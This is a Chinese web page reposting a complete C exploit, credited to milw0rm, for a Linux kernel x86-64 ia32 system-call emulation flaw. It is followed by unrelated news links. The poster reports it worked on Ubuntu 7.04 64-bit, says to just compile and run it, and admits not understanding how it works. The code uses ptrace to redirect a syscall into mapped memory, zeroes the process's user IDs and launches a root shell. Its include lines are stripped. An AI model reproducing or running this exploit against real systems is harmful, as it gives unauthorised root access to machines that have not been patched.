分享
 
 
 

“秒杀”64位Linux系统的漏洞

王朝system·作者佚名  2008-05-18
窄屏简体版  字體: |||超大  

Ubuntu 7.04 64位版本下测试成功。

直接gcc编译后执行就可以了。

不明白程序的原理,漏洞的原因..从描述上看是系统调用上的问题。没有shellcode ,不像是溢出。

/*Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit/*

* exploit for x86_64 linux kernel ia32syscall emulation

* bug, discovered by Wojciech Purczynski

*

* by

* Robert Swiecki

* Przemyslaw Frasunek

* Pawel Pisarczyk

* of ATM-Lab http://www.atm-lab.pl

*/

#include

#include

#include

#include

#include

#include

#include

#include

#include

uint32_t uid, euid, suid;

static void kernelmodecode(void)

{

int i;

uint8_t *gs;

uint32_t *ptr;

asm volatile ("movq %%gs:(0x0), %0" : "=r"(gs));

for (i = 200; i < 1000; i+=1) {

ptr = (uint32_t*) (gs + i);

if ((ptr[0] == uid) && (ptr[1] == euid)

&& (ptr[2] == suid) && (ptr[3] == uid)) {

ptr[0] = 0; //UID

ptr[1] = 0; //EUID

ptr[2] = 0; //SUID

break;

}

}

}

static void docall(uint64_t *ptr, uint64_t size)

{

getresuid(&uid, &euid, &suid);

uint64_t tmp = ((uint64_t)ptr & ~0x00000000000FFF);

if (mmap((void*)tmp, size, PROT_READ|PROT_WRITE|PROT_EXEC,

MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {

printf("mmap fault\n");

exit(1);

}

for (; ptr < (tmp + size); ptr++)

*ptr = (uint64_t)kernelmodecode;

__asm__("\n"

"\tmovq $0x101, %rax\n"

"\tint $0x80\n");

printf("UID %d, EUID:%d GID:%d, EGID:%d\n", getuid(), geteuid(), getgid(), getegid

());

execl("/bin/sh", "bin/sh", 0);

printf("no /bin/sh ??\n");

exit(0);

}

int main(int argc, char **argv)

{

int pid, status, set = 0;

uint64_t rax;

uint64_t kern_s = 0xffffffff80000000;

uint64_t kern_e = 0xffffffff84000000;

uint64_t off = 0x0000000800000101 * 8;

if (argc == 4) {

docall((uint64_t*)(kern_s + off), kern_e - kern_s);

exit(0);

}

if ((pid = fork()) == 0) {

ptrace(PTRACE_TRACEME, 0, 0, 0);

execl(argv[0], argv[0], "2", "3", "4", 0);

perror("exec fault");

exit(1);

}

if (pid == -1) {

printf("fork fault\n");

exit(1);

}

for (;;) {

if (wait(&status) != pid)

continue;

if (WIFEXITED(status)) {

printf("Process finished\n");

break;

}

if (!WIFSTOPPED(status))

continue;

if (WSTOPSIG(status) != SIGTRAP) {

printf("Process received signal: %d\n", WSTOPSIG(status));

break;

}

rax = ptrace(PTRACE_PEEKUSER, pid, 8*ORIG_RAX, 0);

if (rax == 0x000000000101) {

if (ptrace(PTRACE_POKEUSER, pid, 8*ORIG_RAX, off/8) == -1) {

printf("PTRACE_POKEUSER fault\n");

exit(1);

}

set = 1;

}

if ((rax == 11) && set) {

ptrace(PTRACE_DETACH, pid, 0, 0);

for(;;)

sleep(10000);

}

if (ptrace(PTRACE_SYSCALL, pid, 1, 0) == -1) {

printf("PTRACE_SYSCALL fault\n");

exit(1);

}

}

return 0;

}

// milw0rm.com [2007-09-27]

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有